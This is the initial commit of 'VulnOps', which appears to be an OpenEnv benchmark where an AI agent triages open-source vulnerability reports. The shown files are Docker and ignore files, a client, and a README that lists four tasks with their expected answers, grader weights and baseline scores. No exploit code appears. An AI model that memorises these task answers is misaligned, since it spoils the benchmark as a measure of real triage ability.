Spaces:
Sleeping
Sleeping
Adhitya-Vardhan commited on
Commit ·
d63a1ba
0
Parent(s):
Initial commit: VulnOps OpenEnv benchmark
Browse files- Deterministic multi-step vulnerability triage environment
- 4 tasks: easy → medium → hard difficulty ladder
- Typed Pydantic models, step/reset/state API
- Interactive tooluse: search_nvd_database, fetch_commit_diff, message_maintainer
- Heuristic baseline scores 1.0 on all tasks
- FastAPI server ready for Hugging Face Spaces (port 7860)
- .dockerignore +33 -0
- .gitignore +52 -0
- Dockerfile +46 -0
- README.md +236 -0
- __init__.py +11 -0
- client.py +36 -0
- data/README.md +8 -0
- data/snapshot_index.json +1205 -0
- inference.py +313 -0
- models.py +144 -0
- openenv.yaml +6 -0
- pyproject.toml +29 -0
- scripts/build_snapshot_cache.py +139 -0
- scripts/compare_training_speeds.py +38 -0
- scripts/dump_mlx_generation.py +63 -0
- scripts/evaluate_lora.py +133 -0
- scripts/evaluate_mlx.py +137 -0
- scripts/generate_sft_data.py +116 -0
- scripts/prepare_mlx_data.py +145 -0
- scripts/run_lora_pipeline.py +135 -0
- scripts/run_mlx_benchmark.sh +29 -0
- scripts/run_mlx_training.py +147 -0
- scripts/save_mlx_speed.py +48 -0
- scripts/save_pytorch_baseline_speed.py +47 -0
- scripts/start_mlx_training.sh +13 -0
- scripts/train_lora_sft.py +261 -0
- server/Dockerfile +32 -0
- server/__init__.py +1 -0
- server/app.py +34 -0
- server/cases.py +742 -0
- server/graders.py +121 -0
- server/requirements.txt +1 -0
- server/vuln_triage_env_environment.py +315 -0
- tests/test_environment.py +220 -0
- uv.lock +0 -0
.dockerignore
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# --- .dockerignore for VulnOps ---
|
| 2 |
+
# Avoid copying source control and temp files
|
| 3 |
+
.git/
|
| 4 |
+
.github/
|
| 5 |
+
.vscode/
|
| 6 |
+
.DS_Store
|
| 7 |
+
|
| 8 |
+
# Avoid copying project-local environments or caches
|
| 9 |
+
.venv/
|
| 10 |
+
.pytest_cache/
|
| 11 |
+
__pycache__/
|
| 12 |
+
*.pyc
|
| 13 |
+
|
| 14 |
+
# Avoid copying large artifact directories
|
| 15 |
+
artifacts/
|
| 16 |
+
logs/
|
| 17 |
+
.gemini/
|
| 18 |
+
|
| 19 |
+
# Avoid copying build artifacts
|
| 20 |
+
dist/
|
| 21 |
+
build/
|
| 22 |
+
*.egg-info/
|
| 23 |
+
|
| 24 |
+
# Ignore documentation/markdown files not needed for runtime (except README)
|
| 25 |
+
problem-statement.md
|
| 26 |
+
project-ideas-final.md
|
| 27 |
+
implementation-plan.md
|
| 28 |
+
HANDOFF_NEXT_STEPS.md
|
| 29 |
+
training_utils.py # User requested only "required" parts; training is separate.
|
| 30 |
+
client.py # Environment logic is the core, client is for testing.
|
| 31 |
+
tests/ # Tests are for CI, not the production container.
|
| 32 |
+
scripts/ # Original scraping scripts are no longer needed for the benchmark.
|
| 33 |
+
uv.lock # Builder uses it, but no need to copy into the final image if not used.
|
.gitignore
ADDED
|
@@ -0,0 +1,52 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# ---- Python ----
|
| 2 |
+
__pycache__/
|
| 3 |
+
*.py[cod]
|
| 4 |
+
*.pyo
|
| 5 |
+
*.pyd
|
| 6 |
+
.Python
|
| 7 |
+
*.egg-info/
|
| 8 |
+
dist/
|
| 9 |
+
build/
|
| 10 |
+
*.egg
|
| 11 |
+
|
| 12 |
+
# ---- Virtual environments ----
|
| 13 |
+
.venv/
|
| 14 |
+
venv/
|
| 15 |
+
env/
|
| 16 |
+
|
| 17 |
+
# ---- Testing / CI ----
|
| 18 |
+
.pytest_cache/
|
| 19 |
+
.coverage
|
| 20 |
+
htmlcov/
|
| 21 |
+
|
| 22 |
+
# ---- macOS ----
|
| 23 |
+
.DS_Store
|
| 24 |
+
*.DS_Store
|
| 25 |
+
|
| 26 |
+
# ---- IDE / editors ----
|
| 27 |
+
.vscode/
|
| 28 |
+
.idea/
|
| 29 |
+
*.swp
|
| 30 |
+
*.swo
|
| 31 |
+
|
| 32 |
+
# ---- Logs & artifacts ----
|
| 33 |
+
logs/
|
| 34 |
+
artifacts/
|
| 35 |
+
*.log
|
| 36 |
+
|
| 37 |
+
# ---- Planning & dev-only docs (not needed in submission) ----
|
| 38 |
+
problem-statement.md
|
| 39 |
+
project-ideas-final.md
|
| 40 |
+
implementation-plan.md
|
| 41 |
+
HANDOFF_NEXT_STEPS.md
|
| 42 |
+
probe_env.py
|
| 43 |
+
training_utils.py
|
| 44 |
+
|
| 45 |
+
# ---- Local AI tooling ----
|
| 46 |
+
.gemini/
|
| 47 |
+
|
| 48 |
+
# ---- Data snapshots (large, runtime-fetched) ----
|
| 49 |
+
data/snapshots/
|
| 50 |
+
|
| 51 |
+
# ---- uv lock (builder uses it but not needed in git for HF) ----
|
| 52 |
+
# Keep uv.lock — required for reproducible Docker builds
|
Dockerfile
ADDED
|
@@ -0,0 +1,46 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# --- Dockerfile for VulnOps Benchmark ---
|
| 2 |
+
FROM python:3.11-slim AS builder
|
| 3 |
+
|
| 4 |
+
ENV PYTHONDONTWRITEBYTECODE=1 \
|
| 5 |
+
PYTHONUNBUFFERED=1 \
|
| 6 |
+
PIP_NO_CACHE_DIR=1
|
| 7 |
+
|
| 8 |
+
WORKDIR /app
|
| 9 |
+
|
| 10 |
+
# Install uv for fast dependency management
|
| 11 |
+
RUN pip install --no-cache-dir uv
|
| 12 |
+
|
| 13 |
+
# Copy everything needed to build the module
|
| 14 |
+
COPY pyproject.toml uv.lock README.md ./
|
| 15 |
+
COPY server/ ./server/
|
| 16 |
+
|
| 17 |
+
# Install dependencies (without dev)
|
| 18 |
+
RUN uv sync --frozen --no-dev --no-editable
|
| 19 |
+
|
| 20 |
+
# --- Runtime Stage ---
|
| 21 |
+
FROM python:3.11-slim
|
| 22 |
+
|
| 23 |
+
WORKDIR /app
|
| 24 |
+
|
| 25 |
+
# Copy remaining files
|
| 26 |
+
COPY models.py inference.py probe_env.py ./
|
| 27 |
+
COPY server/ ./server/
|
| 28 |
+
COPY data/ ./data/
|
| 29 |
+
|
| 30 |
+
# Copy virtualenv from builder
|
| 31 |
+
COPY --from=builder /app/.venv /app/.venv
|
| 32 |
+
ENV PATH="/app/.venv/bin:$PATH"
|
| 33 |
+
|
| 34 |
+
# Create non-root user and set permissions for Hugging Face Spaces
|
| 35 |
+
RUN useradd -m -u 1000 user && \
|
| 36 |
+
mkdir -p /tmp && \
|
| 37 |
+
chown -R user:user /app /tmp
|
| 38 |
+
|
| 39 |
+
USER 1000
|
| 40 |
+
|
| 41 |
+
# Expose port (HF Spaces defaults to 7860)
|
| 42 |
+
EXPOSE 7860
|
| 43 |
+
|
| 44 |
+
# Default command: Start the environment server
|
| 45 |
+
# Use uvicorn to serve the VulnOps FastAPI application on port 7860
|
| 46 |
+
CMD ["python", "-m", "uvicorn", "server.app:app", "--host", "0.0.0.0", "--port", "7860"]
|
README.md
ADDED
|
@@ -0,0 +1,236 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
title: VulnOps Reasoning Benchmark
|
| 3 |
+
emoji: 🛡️
|
| 4 |
+
colorFrom: blue
|
| 5 |
+
colorTo: indigo
|
| 6 |
+
sdk: docker
|
| 7 |
+
app_port: 7860
|
| 8 |
+
pinned: false
|
| 9 |
+
tags:
|
| 10 |
+
- openenv
|
| 11 |
+
---
|
| 12 |
+
# VulnOps OpenEnv
|
| 13 |
+
|
| 14 |
+
`vulnops` is an OpenEnv benchmark for open-source vulnerability operations. The agent plays the role of a maintainer or security analyst working through incoming vulnerability cases, revealing supporting evidence, filling a structured draft, and submitting the correct next maintainer action.
|
| 15 |
+
|
| 16 |
+
This benchmark is intentionally not a bug-fixing environment and not a generic classifier. It models a real workflow: validating advisories, identifying affected packages and versions, weighing severity versus exploitability, and deciding whether to patch or publish an advisory.
|
| 17 |
+
|
| 18 |
+
## Data sources
|
| 19 |
+
|
| 20 |
+
The benchmark now pulls case data from live public vulnerability feeds at runtime:
|
| 21 |
+
|
| 22 |
+
- OSV for package identity, advisory details, affected ranges, and references
|
| 23 |
+
- NVD for normalized CVE descriptions and CVSS severity metadata
|
| 24 |
+
- EPSS for exploitability scoring signals
|
| 25 |
+
|
| 26 |
+
The environment normalizes those live responses into hidden ground truth on `reset()`. To keep tests, local development, and offline execution stable, each task also includes a bundled fallback snapshot that is used when the APIs are unavailable.
|
| 27 |
+
|
| 28 |
+
In addition to the task-specific fallbacks, the container now ships with a broader cache of 200 provider-backed fallback snapshots under `data/snapshots/`. That keeps the image self-sufficient and gives us room to expand the benchmark without depending entirely on live API availability.
|
| 29 |
+
|
| 30 |
+
## Why this is useful
|
| 31 |
+
|
| 32 |
+
- Real-world utility: OSS maintainers triage reports like these every week.
|
| 33 |
+
- Deterministic grading: each case has hidden ground truth and a reproducible scorer.
|
| 34 |
+
- Multi-step rewards: the agent earns signal for revealing good evidence and filling the draft correctly before final submission.
|
| 35 |
+
- Lightweight deployment: no VM, browser, or external datasets are required at runtime.
|
| 36 |
+
|
| 37 |
+
## Environment interface
|
| 38 |
+
|
| 39 |
+
The environment implements the standard OpenEnv APIs:
|
| 40 |
+
|
| 41 |
+
- `reset(task_id=...) -> VulnTriageObservation`
|
| 42 |
+
- `step(VulnTriageAction) -> VulnTriageObservation`
|
| 43 |
+
- `state -> VulnTriageState`
|
| 44 |
+
|
| 45 |
+
### Action space
|
| 46 |
+
|
| 47 |
+
`VulnTriageAction` has these fields:
|
| 48 |
+
|
| 49 |
+
- `action_type`: one of `read_report`, `inspect_evidence`, `search_nvd_database`, `fetch_commit_diff`, `message_maintainer`, `set_validity`, `set_affected_package`, `set_affected_versions`, `set_severity`, `set_exploitability`, `set_next_action`, `set_missing_information`, `request_more_info`, `submit_triage`
|
| 50 |
+
- `evidence_id`: used with `inspect_evidence`
|
| 51 |
+
- `value`: generic value for label-setting and missing-information actions
|
| 52 |
+
- `rationale`: optional free-form note
|
| 53 |
+
|
| 54 |
+
### Observation space
|
| 55 |
+
|
| 56 |
+
`VulnTriageObservation` returns:
|
| 57 |
+
|
| 58 |
+
- task metadata: `task_id`, `difficulty`, `objective`
|
| 59 |
+
- `report_summary`
|
| 60 |
+
- `visible_evidence`
|
| 61 |
+
- `available_evidence`
|
| 62 |
+
- `draft`
|
| 63 |
+
- `action_history`
|
| 64 |
+
- `steps_remaining`
|
| 65 |
+
- `score_breakdown`
|
| 66 |
+
- `final_score`
|
| 67 |
+
- standard OpenEnv fields: `reward`, `done`, `metadata`
|
| 68 |
+
|
| 69 |
+
## Task ladder
|
| 70 |
+
|
| 71 |
+
### 1. GuardDog Path Traversal
|
| 72 |
+
- Difficulty: easy
|
| 73 |
+
- Goal: Validate the report, identify the package and fixed range, and choose `patch`.
|
| 74 |
+
|
| 75 |
+
### 2. Invenio Multi-Branch XSS
|
| 76 |
+
- Difficulty: medium
|
| 77 |
+
- Goal: Resolve affected versions across multiple release lines and extract truth despite decoy severity signals.
|
| 78 |
+
|
| 79 |
+
### 3. Requests Auth Header Leak
|
| 80 |
+
- Difficulty: medium
|
| 81 |
+
- Goal: Ignore severe threat-intel decoys and use `fetch_commit_diff` to read the Python fix manually.
|
| 82 |
+
|
| 83 |
+
### 4. Gradio Upload XSS
|
| 84 |
+
- Difficulty: hard
|
| 85 |
+
- Goal: Actively `message_maintainer` to discover the lack of a patch and avoid catastrophic penalties by choosing `request_info`.
|
| 86 |
+
|
| 87 |
+
## Baseline Scores
|
| 88 |
+
|
| 89 |
+
The benchmark includes a baseline evaluation script (`inference.py`). Tested against **Qwen3:30b** using the interactive action space:
|
| 90 |
+
|
| 91 |
+
- **Average Score (0-1.0):** `0.3104`
|
| 92 |
+
- **Reasoning Gap:** `68.96%`
|
| 93 |
+
|
| 94 |
+
*Frontier models struggle with proactive tool-use (`search_nvd_database`, `fetch_commit_diff`, `message_maintainer`) instead of passive reading, creating a massive optimization valley for RL evaluation.*
|
| 95 |
+
|
| 96 |
+
## Reward design
|
| 97 |
+
|
| 98 |
+
Per-step reward is shaped to encourage realistic behavior:
|
| 99 |
+
|
| 100 |
+
- positive reward for reading the report, revealing new relevant evidence, and setting a draft field correctly
|
| 101 |
+
- negative reward for repeated evidence inspection, empty or incorrect updates, and premature or low-evidence submission
|
| 102 |
+
- final submission reward equals the normalized grader score in `[0.0, 1.0]`, with a small penalty for submitting with too little evidence
|
| 103 |
+
|
| 104 |
+
### Grader weights
|
| 105 |
+
|
| 106 |
+
- validity: `0.20`
|
| 107 |
+
- affected package: `0.10`
|
| 108 |
+
- affected versions: `0.10`
|
| 109 |
+
- severity: `0.20`
|
| 110 |
+
- exploitability: `0.15`
|
| 111 |
+
- next action: `0.15`
|
| 112 |
+
- missing-information handling: `0.10`
|
| 113 |
+
|
| 114 |
+
## Project structure
|
| 115 |
+
|
| 116 |
+
```text
|
| 117 |
+
.
|
| 118 |
+
├── __init__.py
|
| 119 |
+
├── client.py
|
| 120 |
+
├── inference.py
|
| 121 |
+
├── models.py
|
| 122 |
+
├── openenv.yaml
|
| 123 |
+
├── pyproject.toml
|
| 124 |
+
└── server
|
| 125 |
+
├── app.py
|
| 126 |
+
├─��� cases.py
|
| 127 |
+
├── Dockerfile
|
| 128 |
+
├── graders.py
|
| 129 |
+
└── vuln_triage_env_environment.py
|
| 130 |
+
```
|
| 131 |
+
|
| 132 |
+
## Setup
|
| 133 |
+
|
| 134 |
+
### Local Python setup
|
| 135 |
+
|
| 136 |
+
```bash
|
| 137 |
+
python -m pip install -e ".[dev]"
|
| 138 |
+
```
|
| 139 |
+
|
| 140 |
+
### Run the environment locally
|
| 141 |
+
|
| 142 |
+
```bash
|
| 143 |
+
uvicorn server.app:app --host 0.0.0.0 --port 8000
|
| 144 |
+
```
|
| 145 |
+
|
| 146 |
+
### Validate the environment
|
| 147 |
+
|
| 148 |
+
```bash
|
| 149 |
+
openenv validate .
|
| 150 |
+
```
|
| 151 |
+
|
| 152 |
+
## Inference baseline
|
| 153 |
+
|
| 154 |
+
The required root-level `inference.py` supports two modes:
|
| 155 |
+
|
| 156 |
+
- `--policy openai`: uses the OpenAI Python client, reading credentials from `OPENAI_API_KEY` or `HF_TOKEN`, model name from `MODEL_NAME`, and optional base URL from `API_BASE_URL`
|
| 157 |
+
- `--policy heuristic`: deterministic offline smoke test for local development
|
| 158 |
+
|
| 159 |
+
### Local direct benchmark run
|
| 160 |
+
|
| 161 |
+
```bash
|
| 162 |
+
python inference.py --policy heuristic
|
| 163 |
+
```
|
| 164 |
+
|
| 165 |
+
### Against a running local or remote server
|
| 166 |
+
|
| 167 |
+
```bash
|
| 168 |
+
export ENV_BASE_URL=http://localhost:8000
|
| 169 |
+
python inference.py --policy openai --model "$MODEL_NAME"
|
| 170 |
+
```
|
| 171 |
+
|
| 172 |
+
## Docker
|
| 173 |
+
|
| 174 |
+
Build and run:
|
| 175 |
+
|
| 176 |
+
```bash
|
| 177 |
+
docker build -t vulnops .
|
| 178 |
+
docker run -p 8000:8000 vulnops
|
| 179 |
+
```
|
| 180 |
+
|
| 181 |
+
## Hugging Face Space deployment
|
| 182 |
+
|
| 183 |
+
This project is packaged for a container-based FastAPI Space. The Space should be tagged with `openenv` and pointed at the provided `Dockerfile`.
|
| 184 |
+
|
| 185 |
+
## Expected baseline behavior
|
| 186 |
+
|
| 187 |
+
The heuristic policy should score `1.0` on all three bundled fallback snapshots. The OpenAI baseline is intended as the hackathon submission baseline and should be reproducible with `temperature=0`.
|
| 188 |
+
|
| 189 |
+
## Local LoRA learnability check
|
| 190 |
+
|
| 191 |
+
This repo now includes a local LoRA pipeline for a quick "is the environment learnable?" check with `Qwen/Qwen3.5-4B`.
|
| 192 |
+
|
| 193 |
+
On Apple Silicon, the recommended path is now `MLX`, not the older PyTorch `MPS` path.
|
| 194 |
+
|
| 195 |
+
### What it does
|
| 196 |
+
|
| 197 |
+
- generates deterministic heuristic transitions from the environment
|
| 198 |
+
- expands them into prompt-variant SFT examples
|
| 199 |
+
- runs LoRA SFT with checkpointing
|
| 200 |
+
- evaluates the base model and adapted model back on `vulnops`
|
| 201 |
+
- writes append-only logs so interrupted runs still leave useful evidence
|
| 202 |
+
|
| 203 |
+
### Install the training extra
|
| 204 |
+
|
| 205 |
+
```bash
|
| 206 |
+
python -m pip install -e ".[train]"
|
| 207 |
+
```
|
| 208 |
+
|
| 209 |
+
### Recommended MLX path
|
| 210 |
+
|
| 211 |
+
```bash
|
| 212 |
+
python -m pip install mlx mlx-lm
|
| 213 |
+
./scripts/start_mlx_training.sh
|
| 214 |
+
```
|
| 215 |
+
|
| 216 |
+
Artifacts are written under `artifacts/mlx_qwen3_4b/`:
|
| 217 |
+
|
| 218 |
+
- `run_manifest.json`: current status and latest known checkpoint
|
| 219 |
+
- `data/train.jsonl`: MLX-ready SFT records
|
| 220 |
+
- `logs/mlx_train.log`: main training log
|
| 221 |
+
- `logs/nohup.out`: launcher stdout/stderr
|
| 222 |
+
- `metrics/speed_mlx.json`: parsed speed summary
|
| 223 |
+
- `adapters/`: MLX adapter artifacts
|
| 224 |
+
- `training_summary.json`: final run status
|
| 225 |
+
|
| 226 |
+
If you stop the run midway, rerun `python scripts/run_mlx_training.py --model Qwen/Qwen3.5-4B --output-root artifacts/mlx_qwen3_4b`.
|
| 227 |
+
It will reuse the prepared dataset and resume from the saved adapter file when present.
|
| 228 |
+
|
| 229 |
+
### Current speed comparison
|
| 230 |
+
|
| 231 |
+
On this Mac, the saved local benchmark showed:
|
| 232 |
+
|
| 233 |
+
- PyTorch `MPS`: about `72.5s/step`
|
| 234 |
+
- MLX: about `16.4s/step`
|
| 235 |
+
|
| 236 |
+
See [artifacts/speed_comparison.json](/Users/adithyavardhan/Tweeks/hack/artifacts/speed_comparison.json).
|
__init__.py
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""OpenEnv vulnerability triage environment package."""
|
| 2 |
+
|
| 3 |
+
from .client import VulnTriageEnv
|
| 4 |
+
from .models import VulnTriageAction, VulnTriageObservation, VulnTriageState
|
| 5 |
+
|
| 6 |
+
__all__ = [
|
| 7 |
+
"VulnTriageAction",
|
| 8 |
+
"VulnTriageEnv",
|
| 9 |
+
"VulnTriageObservation",
|
| 10 |
+
"VulnTriageState",
|
| 11 |
+
]
|
client.py
ADDED
|
@@ -0,0 +1,36 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Typed OpenEnv client for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
from typing import Dict
|
| 6 |
+
|
| 7 |
+
from openenv.core import EnvClient
|
| 8 |
+
from openenv.core.client_types import StepResult
|
| 9 |
+
|
| 10 |
+
from .models import (
|
| 11 |
+
EvidenceItem,
|
| 12 |
+
TriageDraft,
|
| 13 |
+
VulnTriageAction,
|
| 14 |
+
VulnTriageObservation,
|
| 15 |
+
VulnTriageState,
|
| 16 |
+
)
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
class VulnTriageEnv(
|
| 20 |
+
EnvClient[VulnTriageAction, VulnTriageObservation, VulnTriageState]
|
| 21 |
+
):
|
| 22 |
+
"""Persistent typed client for the vulnerability triage benchmark."""
|
| 23 |
+
|
| 24 |
+
def _step_payload(self, action: VulnTriageAction) -> Dict:
|
| 25 |
+
return action.model_dump(exclude_none=True)
|
| 26 |
+
|
| 27 |
+
def _parse_result(self, payload: Dict) -> StepResult[VulnTriageObservation]:
|
| 28 |
+
observation = VulnTriageObservation.model_validate(payload.get("observation", {}))
|
| 29 |
+
return StepResult(
|
| 30 |
+
observation=observation,
|
| 31 |
+
reward=payload.get("reward"),
|
| 32 |
+
done=payload.get("done", False),
|
| 33 |
+
)
|
| 34 |
+
|
| 35 |
+
def _parse_state(self, payload: Dict) -> VulnTriageState:
|
| 36 |
+
return VulnTriageState.model_validate(payload)
|
data/README.md
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Snapshot Cache
|
| 2 |
+
|
| 3 |
+
This directory stores provider-backed fallback snapshots used when live OSV, NVD, or EPSS requests fail.
|
| 4 |
+
|
| 5 |
+
- `snapshots/*.json`: normalized raw provider snapshots keyed by OSV advisory ID
|
| 6 |
+
- `snapshot_index.json`: catalog of bundled snapshot files
|
| 7 |
+
|
| 8 |
+
The files are intended to be generated by `scripts/build_snapshot_cache.py`.
|
data/snapshot_index.json
ADDED
|
@@ -0,0 +1,1205 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
